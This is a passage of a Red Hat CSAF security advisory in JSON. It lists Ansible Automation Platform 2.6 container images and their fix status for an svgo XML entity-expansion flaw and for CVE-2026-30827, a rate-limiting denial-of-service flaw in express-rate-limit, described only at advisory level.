"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "svgo: SVGO: Denial of Service via XML entity expansion"
},
{
"cve": "CVE-2026-30827",
"cwe": {
"id": "CWE-1389",
"name": "Incorrect Parsing of Numbers with Different Radices"
},
"discovery_date": "2026-03-07T06:01:06.325390+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445429"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in express-rate-limit. The default key generator incorrectly applies IPv6 subnet masking to IPv4-mapped IPv6 addresses, which are used when an IPv4 client connects to a dual-stack server. This misconfiguration causes all IPv4 traffic to be treated as a single entity for rate limiting. Consequently, a remote attacker can exhaust the rate limit with a single client, leading to a Denial of Service (DoS) for all other IPv4 clients by causing them to receive HTTP 429 errors.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express-rate-limit: express-rate-limit: Denial of Service for IPv4 clients due to incorrect IPv6 subnet masking",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
